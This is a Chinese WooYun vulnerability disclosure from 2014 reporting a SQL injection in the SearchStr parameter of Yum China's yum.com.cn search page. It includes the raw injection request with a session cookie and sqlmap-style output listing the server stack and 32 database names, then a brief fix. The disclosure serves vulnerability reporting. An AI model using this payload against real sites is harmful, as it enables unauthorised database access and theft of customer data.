百胜餐饮集团中国事业部某处SQL注入

编号83367
Urlhttp://www.wooyun.org/bug.php?action=view&id=83367
漏洞状态未联系到厂商或者厂商积极忽略
漏洞标题百胜餐饮集团中国事业部某处SQL注入
漏洞类型
厂商yum.com.cn
白帽子pandada
提交日期2014-11-15 12:00:00
公开日期2014-12-30 12:02:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank12
厂商评级
厂商评rank0
漏洞简介
百胜餐饮集团中国事业部隶属于美国纽约证券交易所挂牌上市的百胜餐饮集团(Yum! Brands,Inc.)。百胜餐饮集团是全球餐厅网络最大的餐饮集团之一,在全球超过125个国家和地区拥有超过39000家连锁餐厅, 员工人数150多万。百胜餐饮集团旗下肯德基、必胜客和塔可钟三个餐饮品牌分别在烹鸡、比萨、墨西哥风味食品连锁餐饮领域居全球领导地位。2013年,百胜餐饮集团荣获美国《企业责任杂志》评选的“100家最佳企业公民”。
漏洞细节

注入点为SearchStr

GET /news_search_result.aspx?SearchStr=e%25'%20AND%203*2*1%3d6%20AND%20'000c9fZ'%21%3d'000c9fZ%25 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.yum.com.cn:80/
Cookie: NSC_CX_QfstjtufodzHspvq=ffffffff09320b0445525d5f4f58455e445a4a423660
Host: www.yum.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

POC

web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [32]:
[*] [YUM-PHD]
[*] DFJB
[*] dfjb_new
[*] Email_service
[*] kfchealth
[*] KFCII
[*] kfcmusic2011
[*] LansumEdm
[*] LittleSheep2013
[*] master
[*] model
[*] msdb
[*] phdi2011
[*] phdi2014
[*] phduty
[*] PHParty
[*] PizzaHut
[*] tempdb
[*] xfy
[*] xfyAAA
[*] xfyqa
[*] YUM
[*] YumCampaignSystem
[*] YumService
[*] YumStore
[*] YumStore20141107
[*] YumstoreAAA
[*] YumStoreVisited
[*] YumStoreVisited_new
[*] YumStoreVisitedAAA
[*] YumSupplier
[*] Yumyouhui

修复方案

参数过滤

状态信息 2014-11-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-30: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复(not set)
回应信息未能联系到厂商或者厂商积极拒绝